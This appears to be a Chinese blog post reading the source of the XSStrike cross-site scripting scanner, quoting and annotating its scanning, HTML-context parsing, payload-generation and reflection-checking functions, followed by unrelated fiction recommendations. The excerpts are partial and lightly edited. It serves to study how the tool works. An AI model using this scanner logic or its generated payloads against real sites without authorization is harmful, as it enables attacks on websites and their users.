XSStrike源码阅读（2）

扫描器工作流程图

image.png

具体流程代码

主扫描文件为scan.py

def scan(target, paramData, encoding, headers, delay, timeout, skipDOM, find, skip):
    GET, POST = (False, True) if paramData else (True, False)
    # If the user hasn't supplied the root url with http(s), we will handle it
    if not target.startswith('http'):
        try:
            response = requester('https://' + target, {},
                                 headers, GET, delay, timeout)
            target = 'https://' + target
        except:
            target = 'http://' + target
    logger.debug('Scan target: {}'.format(target))
    response = requester(target, {}, headers, GET, delay, timeout).text

    #去掉dom和waf的代码

    for paramName in params.keys():
        paramsCopy = copy.deepcopy(params)
        logger.info('Testing parameter: %s' % paramName)
        if encoding:
            paramsCopy[paramName] = encoding(xsschecker)
        else:
            paramsCopy[paramName] = xsschecker  #换成了v3dm0s
        response = requester(url, paramsCopy, headers, GET, delay, timeout) #封装之后 指示处理了请求头
        occurences = htmlParser(response, encoding)
        positions = occurences.keys() #提取敏感字符出现在源码的位置
        logger.debug('Scan occurences: {}'.format(occurences))
        if not occurences:
            logger.error('No reflection found')
            continue
        else:
            logger.info('Reflections found: %i' % len(occurences))#发现几个位置  
        logger.run('Analysing reflections')
        efficiencies = filterChecker(
            url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)
        logger.debug('Scan efficiencies: {}'.format(efficiencies))
        logger.run('Generating payloads')
        total=0
        for v in vectors.values():
            total += len(v)
        if total == 0:
            logger.error('No vectors were crafted.')
            continue
        logger.info('Payloads generated: %i' % total)
        progress = 0
        print('vectors',vectors)
        for confidence, vects in vectors.items():
            for vect in vects:
                if core.config.globalVariables['path']:
                    vect = vect.replace('/', '%2F')
                loggerVector = vect
                progress += 1
                logger.run('Progress: %i/%i\r' % (progress, total))
                if not GET:
                    vect = unquote(vect)
                efficiencies = checker(
                    url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding) #利用如果我们的payload原模原样的出现在了响应中，那么基本可以确定漏洞确实存在了，就可以报告出来了
                if not efficiencies:
                    for i in range(len(occurences)):
                        efficiencies.append(0)
                bestEfficiency = max(efficiencies)
                if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
                    logger.red_line()
                    logger.good('Payload: %s' % loggerVector)
                    logger.info('Efficiency: %i' % bestEfficiency)
                    logger.info('Confidence: %i' % confidence)
                    if not skip:
                        choice = input(
                            '%s Would you like to continue scanning? [y/N] ' % que).lower()
                        if choice != 'y':
                            quit()
                elif bestEfficiency > minEfficiency:
                    logger.red_line()
                    logger.good('Payload: %s' % loggerVector)
                    logger.info('Efficiency: %i' % bestEfficiency)
                    logger.info('Confidence: %i' % confidence)
        logger.no_format('')

htmlParser.py 文件（省略requester.py文件，此文件为对request的封装）

import re
import sys 
sys.path.append("..") 

from config import badTags, xsschecker
from utils.utils import isBadContext, equalize, escaped, extractScripts
from utils.log import log   #打印日志
#通过解析html，找出我们的输入输出在了哪种环境下
def htmlParser(response, encoding):
    print('进入htmlParser')
    rawResponse = response  # raw response returned by requests
    response = response.text  # response content
    if encoding:  # if the user has specified an encoding, encode the probe in that
        response = response.replace(encoding(xsschecker), xsschecker)
    reflections = response.count(xsschecker)
    print("有回显且回显位置有{}".format(reflections))

    position_and_context = {}
    environment_details = {}
    clean_response = re.sub(r'<!--[.\s\S]*?-->', '', response) #删除html注释
    script_checkable = clean_response

    for script in extractScripts(script_checkable):           #如果回显位在<script>标签里
        occurences = re.finditer(r'(%s.*?)$' % xsschecker, script)
        if occurences:
            for occurence in occurences:
                log.debug('occurences%s'%occurence)
                thisPosition = occurence.start(1)
                position_and_context[thisPosition] = 'script'
                environment_details[thisPosition] = {}
                environment_details[thisPosition]['details'] = {'quote' : ''}
                for i in range(len(occurence.group())):
                    currentChar = occurence.group()[i]
                    if currentChar in ('/', '\'', '`', '"') and not escaped(i, occurence.group()):
                        environment_details[thisPosition]['details']['quote'] = currentChar
                    elif currentChar in (')', ']', '}', '}') and not escaped(i, occurence.group()):
                        break
                script_checkable = script_checkable.replace(xsschecker, '', 1)
    
    if len(position_and_context) < reflections:  #如果标签里的数量，小于回显位的数量，则证明回显位在标签外面也有
        attribute_context = re.finditer(r'<[^>]*?(%s)[^>]*?>' % xsschecker, clean_response)  #在<> 标签里 有敏感字符
        # print(attribute_context,55555555555)
        #    log.debug('occurences%s'%occurence)
        for occurence in attribute_context:
            match = occurence.group(0)  #匹配的整个 字符串
            thisPosition = occurence.start(1)
            parts = re.split(r'\s', match)
            tag = parts[0][1:]  #提取出标签 如 input
            for part in parts:
                if xsschecker in part:
                    Type, quote, name, value = '', '', '', ''
                    if '=' in part:
                        quote = re.search(r'=([\'`"])?', part).group(1) #找到  value="v3dm0s" 后面是单引号还是双引号
                        name_and_value = part.split('=')[0], '='.join(part.split('=')[1:])#分开 value="v3dm0s" 的name 和value
                        if xsschecker == name_and_value[0]:
                            Type = 'name'
                        else:
                            Type = 'value'
                        name = name_and_value[0]
                        value = name_and_value[1].rstrip('>').rstrip(quote).lstrip(quote)
                    else:
                        Type = 'flag'
                    position_and_context[thisPosition] = 'attribute'
                    environment_details[thisPosition] = {}  
                    environment_details[thisPosition]['details'] = {'tag' : tag, 'type' : Type, 'quote' : quote, 'value' : value, 'name' : name} #'position': 455, 'context': 'attribute', 'details': {'tag': 'input', 'type': 'value', 'quote': '"', 'value': 'v3dm0s', 'name': 'value'}}}


    if len(position_and_context) < reflections:
        html_context = re.finditer(xsschecker, clean_response) #寻找敏感字符
        for occurence in html_context:
            print(occurence,'occurenceoccurence')
            thisPosition = occurence.start()
            if thisPosition not in position_and_context:
                position_and_context[occurence.start()] = 'html' #{'position': 355, 'context': 'html', 'details': {}
                environment_details[thisPosition] = {}
                environment_details[thisPosition]['details'] = {}
    if len(position_and_context) < reflections:
        comment_context = re.finditer(r'<!--[\s\S]*?(%s)[\s\S]*?-->' % xsschecker, response) #在注释里寻找敏感字符
        for occurence in comment_context:
            thisPosition = occurence.start(1)
            position_and_context[thisPosition] = 'comment'
            environment_details[thisPosition] = {}
            environment_details[thisPosition]['details'] = {}
    database = {}
    for i in sorted(position_and_context):
        database[i] = {}
        database[i]['position'] = i
        database[i]['context'] = position_and_context[i]
        database[i]['details'] = environment_details[i]['details']
    print(database,666666666666666)

    Z#除去没用的tag
    bad_contexts = re.finditer(r'(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>' % xsschecker, response)
    non_executable_contexts = []
    for each in bad_contexts:
        non_executable_contexts.append([each.start(), each.end(), each.group(1)])

    if non_executable_contexts:
        for key in database.keys():
            position = database[key]['position']
            badTag = isBadContext(position, non_executable_contexts)
            if badTag:
                database[key]['details']['badTag'] = badTag
            else:
                database[key]['details']['badTag'] = ''
    return database

产生密码 vectors = generator(occurences, response.text) generator.py

def generator(occurences, response):
    scripts = extractScripts(response)
    index = 0
    vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
               6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
    print(occurences,'occurencesoccurences')
    for i in occurences:
        context = occurences[i]['context']
        if context == 'html':
            lessBracketEfficiency = occurences[i]['score']['<']
            greatBracketEfficiency = occurences[i]['score']['>']
            ends = ['//']
            badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
            if greatBracketEfficiency == 100:
                ends.append('>')
            if lessBracketEfficiency:
                print(ends,'endsendsendsendsends')  
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends, badTag) #ends= ['//', '>']
                print(len(payloads),888888888)
                for payload in payloads:
                    vectors[10].add(payload)

def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None):
    vectors = []
    r = randomUpper  # randomUpper randomly converts chars of a string to uppercase
    for tag in tags:
        if tag == 'd3v' or tag == 'a':
            bait = xsschecker
        else:
            bait = ''
        for eventHandler in eventHandlers:
            # print(11111111,eventHandler)
            # if the tag is compatible with the event handler
            if tag in eventHandlers[eventHandler]:
                count=0
                for function in functions:
                    # print(2222222222222,function)
                    for filling in fillings:
                        # print(333333333,filling)
                        for eFilling in eFillings:
                            # print(44444444444,eFilling)
                            for lFilling in lFillings:
                                # print(5555555555,lFilling)
                                for end in ends:
                                    if tag == 'd3v' or tag == 'a':
                                        if '>' in ends:
                                            end = '>'  # we can't use // as > with "a" or "d3v" tag
                                    breaker = ''
                                    if badTag:
                                        breaker = '</' + r(badTag) + '>'
                                    # print(breaker,tag,filling,eventHandler,eFilling,function,lFilling,end,bait)
                                    vector = breaker + '<' + r(tag) + filling + r(
                                        eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
                                    vectors.append(vector)
    return vectors

再次利用产生的payload 验证是否存在xss

        for confidence, vects in vectors.items():
            for vect in vects:
                if core.config.globalVariables['path']:
                    vect = vect.replace('/', '%2F')
                loggerVector = vect
                progress += 1
                logger.run('Progress: %i/%i\r' % (progress, total))
                if not GET:
                    vect = unquote(vect)
                efficiencies = checker(
                    url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding) #利用如果我们的payload原模原样的出现在了响应中，那么基本可以确定漏洞确实存在了，就可以报告出来了
                if not efficiencies:
                    for i in range(len(occurences)):
                        efficiencies.append(0)
                bestEfficiency = max(efficiencies)
                if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
                    logger.red_line()
                    logger.good('Payload: %s' % loggerVector)
                    logger.info('Efficiency: %i' % bestEfficiency)
                    logger.info('Confidence: %i' % confidence)
                    if not skip:
                        choice = input(
                            '%s Would you like to continue scanning? [y/N] ' % que).lower()
                        if choice != 'y':
                            quit()
                elif bestEfficiency > minEfficiency:
                    logger.red_line()
                    logger.good('Payload: %s' % loggerVector)
                    logger.info('Efficiency: %i' % bestEfficiency)
                    logger.info('Confidence: %i' % confidence)
        logger.no_format('')

关键对比函数 checker

#payload 为前文生成的environment  {'"', '>', '<'}
def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
    checkString = 'st4r7s' + payload + '3nd'
    if encoding:
        checkString = encoding(unquote(checkString))
    response = requester(url, replaceValue(
        params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower()
    reflectedPositions = []
    for match in re.finditer('st4r7s', response):
        reflectedPositions.append(match.start())

    filledPositions = fillHoles(positions, reflectedPositions)
    #  Itretating over the reflections
    num = 0
    efficiencies = []
    for position in filledPositions:
        allEfficiencies = []
        try:
            reflected = response[reflectedPositions[num]
                :reflectedPositions[num]+len(checkString)]  #取出敏感字符 在返回包内的 字符是什么 如敏感字符为'st4r7s' + payload + '3nd' 返回为st4r7s&gt;
            efficiency = fuzz.partial_ratio(reflected, checkString.lower())#部分匹配，如果S1是S2的子串依然返回100；
            allEfficiencies.append(efficiency)

        except IndexError:
            pass
        if position:
            reflected = response[position:position+len(checkString)]
            if encoding:
                checkString = encoding(checkString.lower())
            efficiency = fuzz.partial_ratio(reflected, checkString)
            if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
                efficiency = 90
            allEfficiencies.append(efficiency)
            efficiencies.append(max(allEfficiencies))
        else:
            efficiencies.append(0)
        num += 1
    return list(filter(None, efficiencies))

def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
    positions = occurences.keys()
    sortedEfficiencies = {}
    # adding < > to environments anyway because they can be used in all contexts
    environments = set(['<', '>'])
    for i in range(len(positions)):
        sortedEfficiencies[i] = {}
    for i in occurences:
        occurences[i]['score'] = {}
        context = occurences[i]['context']
        if context == 'comment':
            environments.add('-->')
        elif context == 'script':
            environments.add(occurences[i]['details']['quote'])
            environments.add('</scRipT/>')
        elif context == 'attribute':
            if occurences[i]['details']['type'] == 'value':
                if occurences[i]['details']['name'] == 'srcdoc':  # srcdoc attribute accepts html data with html entity encoding
                    environments.add('&lt;')  # so let's add the html entity
                    environments.add('&gt;')  # encoded versions of < and >
            if occurences[i]['details']['quote']:
                environments.add(occurences[i]['details']['quote'])
    print(environments,'environmentsenvironmentsenvironments')
    
    for environment in environments:
        if environment:
            efficiencies = checker(
                url, params, headers, GET, delay, environment, positions, timeout, encoding)
            efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
            for occurence, efficiency in zip(occurences, efficiencies):
                occurences[occurence]['score'][environment] = efficiency
    print(occurences,'occurencesoccurences')
    return occurences

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 202,980评论 5赞 476
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 85,178评论 2赞 380
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 149,868评论 0赞 336
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 54,498评论 1赞 273
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 63,492评论 5赞 364
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 48,521评论 1赞 281
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 37,910评论 3赞 395
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 36,569评论 0赞 256
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 40,793评论 1赞 296
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 35,559评论 2赞 319
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 37,639评论 1赞 329
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 33,342评论 4赞 318
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 38,931评论 3赞 307
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 29,904评论 0赞 19
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 31,144评论 1赞 259
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 42,833评论 2赞 349
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 42,350评论 2赞 342

XSStrike源码阅读（2）

扫描器工作流程图

具体流程代码

主扫描文件为scan.py

htmlParser.py 文件（省略requester.py文件，此文件为对request的封装）

产生密码 vectors = generator(occurences, response.text) generator.py

再次利用产生的payload 验证是否存在xss

关键对比函数 checker

推荐阅读更多精彩内容